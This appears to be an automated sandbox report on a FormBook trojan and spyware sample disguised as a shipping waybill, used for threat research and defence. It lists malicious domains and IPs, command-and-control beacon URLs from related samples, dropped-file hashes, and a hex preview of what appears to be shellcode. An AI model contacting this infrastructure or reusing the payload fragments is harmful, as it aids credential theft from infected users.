                                                            http://lakemontbellevue.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.orthonow.livejFlHFdZgIYNZqR.exe, 00000005.00000002.23185812160.0000000000E75000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico45570IH2.4.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/skin-default.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/style.css?ver=6.5.5jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.w.org/jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://stats.wp.com/e-202427.jsRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/font-awesome/css/font-awesRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/owl.carousel.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/jquery.min.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://vintagewins.com/n8dl/?vX=FC28RpcPing.exe, 00000004.00000002.23187811443.0000000004822000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003C62000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6RpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/screen-reader-text.js?ver=RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7cRpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.pngRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/menu.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/all.min.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/assets/css/dark-brown-theme.css?vRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=300%2CRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            66.235.200.145
                                                            		lakemontbellevue.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            203.161.50.127
                                                            		www.spotluv.xyzMalaysia
                                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                                            103.120.176.124
                                                            		vintagewins.comIndia
                                                            		17439NETMAGIC-APNetmagicDatacenterMumbaiINtrue
                                                            154.53.59.40
                                                            		adamknoxexperience.comUnited States
                                                            		174COGENT-174USfalse
                                                            84.32.84.192
                                                            		www.paliinfra.com.cdn.hstgr.netLithuania
                                                            		33922NTT-LT-ASLTtrue
                                                            172.67.146.224
                                                            		www.olhadeputat.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            74.208.236.38
                                                            		www.costmoon.comUnited States
                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            199.59.243.226
                                                            		www.orthonow.liveUnited States
                                                            		395082BODIS-NJUStrue
                                                            74.208.236.230
                                                            		www.motorsportgives.comUnited States
                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            142.202.6.230
                                                            		www.6171nvuhb.rentReserved
                                                            		62838REPRISE-HOSTINGUStrue
                                                            3.33.130.190
                                                            		musiccitysauce.comUnited States
                                                            		8987AMAZONEXPANSIONGBtrue
                                                            44.227.65.245
                                                            		pixie.porkbun.comUnited States
                                                            		16509AMAZON-02UStrue

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1467058
                                                            Start date and time:2024-07-03 17:31:42 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 17m 14s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected Instruction Hammering
                                                            Number of analysed new started processes analysed:5
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:AWB NO. 077-57676135055.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@16/12
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 98%
                                                            • Number of executed functions: 46
                                                            • Number of non-executed functions: 258
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: AWB NO. 077-57676135055.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            11:35:13API Interceptor33676564x Sleep call for process: RpcPing.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            66.235.200.145DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                                            • www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
                                                            INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                            2FcJgghyXg.exeGet hashmaliciousFormBookBrowse
                                                            • www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
                                                            ClbrTLBbVA.exeGet hashmaliciousFormBookBrowse
                                                            • www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                                            r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
                                                            BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
                                                            GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
                                                            0ySMPNiDoA.exeGet hashmaliciousFormBookBrowse
                                                            • www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
                                                            6014853.exeGet hashmaliciousFormBookBrowse
                                                            • www.firepowerexpo.com/f649/?Ih3=m1lqWHCBQ/kUfIId9G1Zl7+cXxQgMOESuv3uKkpy1j9VjbvHsanxuQVfMZjTZucRw3bqX9o71XHJz8Ptxs35IAYHht5fw0SXRQ==&FTBSzg=_AtxeQJqoYkM5z7B
                                                            DHL Consignment Details_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.atwatercab.com/s20g/?x8b=8pNLsfJxhBPPAD4P&d48PB=rZ/46zgpbKJOe2X3A4FYFLQg1vAXxuRWnT2LQvG1tr3ZSe4vYgV8EIvoDLg6imzOZAE7E347lg==
                                                            203.161.50.127PAYROLL.docGet hashmaliciousFormBookBrowse
                                                            • www.evolveenterprises.top/ro6r/?dJqp=o4zmNqBJYlNtN0UyHUxno7qBCaLAqrJphLcgIRpT4n8ozC/7e7pDBEqM2Rd+uJTS6EPOWI0i7oPhIrHAygO87MqHngSCYYqQB9vq6D9ICnr41afOJLQGIeUNryzh&WnF4=YlbDSxW
                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            tee030.docGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            Inquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.titantechnologies.life/gh9e/
                                                            ALL-LINK DRAFT_gz.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.radiantresources.xyz/9q39/
                                                            fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                            • www.radiantresources.xyz/r6ib/
                                                            KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.titantechnologies.life/gh9e/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.6171nvuhb.rentSecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeGet hashmaliciousFormBookBrowse
                                                            • 142.202.6.230
                                                            www.costmoon.com7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                            • 74.208.236.38
                                                            SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeGet hashmaliciousFormBookBrowse
                                                            • 74.208.236.38
                                                            www.motorsportgives.comSecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeGet hashmaliciousFormBookBrowse
                                                            • 74.208.236.230
                                                            pixie.porkbun.com7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.65.245
                                                            INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166
                                                            PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166
                                                            MT103-746394.docGet hashmaliciousFormBookBrowse
                                                            • 44.227.65.245
                                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                            • 44.227.65.245
                                                            PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166
                                                            Eugg3yid0O.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166
                                                            Maersk Arrival Notice ready for Bill of Lading 238591458-393747337-837473734-283473743.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.65.245
                                                            Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166
                                                            UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                            • 44.227.76.166

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            VNPT-AS-VNVNPTCorpVNfile.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            fisher man.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.55.124
                                                            GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.55.102
                                                            MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.41.205
                                                            RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.49.220
                                                            SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.49.220
                                                            RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • 203.161.46.44
                                                            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.49.220
                                                            Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.49.220
                                                            COGENT-174UShttps://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                                            • 23.237.152.90
                                                            8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                            • 38.6.177.47
                                                            7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                            • 38.47.232.185
                                                            GA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • 206.233.240.73
                                                            GaTxCRa6li.exeGet hashmaliciousGuLoaderBrowse
                                                            • 38.153.61.199
                                                            file.exeGet hashmaliciousFormBookBrowse
                                                            • 38.47.158.160
                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                            • 38.162.204.50
                                                            watchdog.elfGet hashmaliciousMiraiBrowse
                                                            • 38.251.174.191
                                                            pKqvOdh3Sv.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 206.5.238.105
                                                            http://d.sogouad.vip/txt/black.txtGet hashmaliciousUnknownBrowse
                                                            • 206.119.165.54
                                                            NETMAGIC-APNetmagicDatacenterMumbaiINVSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                            • 103.120.178.210
                                                            cbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.235.106.10
                                                            td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                                                            • 101.53.150.12
                                                            VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                            • 103.120.178.210
                                                            PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 103.120.178.210
                                                            m2PQz5E1Zv.elfGet hashmaliciousMiraiBrowse
                                                            • 180.179.125.117
                                                            NnS9ImJPht.elfGet hashmaliciousUnknownBrowse
                                                            • 203.95.216.191
                                                            z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.143.46.83
                                                            M0akqPlgtl.elfGet hashmaliciousMiraiBrowse
                                                            • 180.179.125.122
                                                            sEzW1OZkw1.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 103.214.114.32
                                                            CLOUDFLARENETUSRFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            Service Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.2.184
                                                            MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.97.3
                                                            https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.2.184
                                                            http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                                            • 104.22.21.226
                                                            https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            7EulSGn18e.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.154.12
                                                            NSLC_Billing_Document_No_0240255100.htmlGet hashmaliciousCVE-2024-21412Browse
                                                            • 104.16.231.132
                                                            62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 188.114.97.3

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\45570IH2

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\RpcPing.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):122880
                                                            Entropy (8bit):1.1414673161713362
                                                            Encrypted:false
                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                            MD5:24937DB267D854F3EF5453E2E54EA21B
                                                            SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                            SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                            SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\acceptancy

                                                            Download File
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):286208
                                                            Entropy (8bit):7.992791969913571
                                                            Encrypted:true
                                                            SSDEEP:6144:uwkTDIirbOKJhK54lLH70h/AiC2gCryJtTdYL7owG+8tEw:bwxRhU4x8tnmJbW7oAoEw
                                                            MD5:269F6A1274A6B8CCB02A4A704F7B16AF
                                                            SHA1:D5E926F5213FBEC4C8E285EDA22EAFE920822646
                                                            SHA-256:20A7818AB406DC49055B355F60FDF7F70687C2090FFBDDDDE2E346E543BB5776
                                                            SHA-512:F4EDEF7F71B285F3904A8BEAFAEF35C3DAE6F5CD812025F4FE9E3BD7EE2AD51FAE068A5DDBBB9E3ECD0F9D574FACFD0A1CCA5B250896CF50B52B3EC62094AC1E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...b.RCB1i.X...~.06....2D...L3VBM05RCB11LBQNL3VBM05RCB11LB.NL3X].>5.J...M..o.[?1m@G=$0P\l!0 "\"b/U. 6,.X"b....;-)U._NH.1LBQNL3/CD..2$..Q+.l.+.L....2$.+..m.+.L....2$.cX/*l.+.VBM05RCBatLB.OM3d8Mh5RCB11LB.NN2]CF05.GB11LBQNL3.WM05BCB1QHBQN.3VRM05PCB71LBQNL3PBM05RCB1QHBQLL3VBM07R..11\BQ^L3VB]05BCB11LBANL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3x6(HARCBEzHBQ^L3V.I05BCB11LBQNL3VBM0.RC"11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB

                                                            C:\Users\user\AppData\Local\Temp\adstipulator

                                                            Download File
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:ASCII text, with very long lines (28756), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):28756
                                                            Entropy (8bit):3.591296839010836
                                                            Encrypted:false
                                                            SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyu9:miTZ+2QoioGRk6ZklputwjpjBkCiw2RR
                                                            MD5:0A5372B7F3DDDDF819A63558F28BA762
                                                            SHA1:8C03B485BCAA0C8D54D1595981A7DFF100F5ED0B
                                                            SHA-256:1DB6A57B2846A9C4D47C5F2BA9E9F7FA2FCE56AAAED5D5FE7984E0AAA9BDB8C0
                                                            SHA-512:EB04606B433E49E84205C8D227828EECBCF175F76CCD67E5A8371B604847E7A20D00EB9AC7E5577675E25497CD890E43C7616D42FCA15E02B0AA0F180A57BFF5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                                            C:\Users\user\AppData\Local\Temp\autF6BF.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):286208
                                                            Entropy (8bit):7.992791969913571
                                                            Encrypted:true
                                                            SSDEEP:6144:uwkTDIirbOKJhK54lLH70h/AiC2gCryJtTdYL7owG+8tEw:bwxRhU4x8tnmJbW7oAoEw
                                                            MD5:269F6A1274A6B8CCB02A4A704F7B16AF
                                                            SHA1:D5E926F5213FBEC4C8E285EDA22EAFE920822646
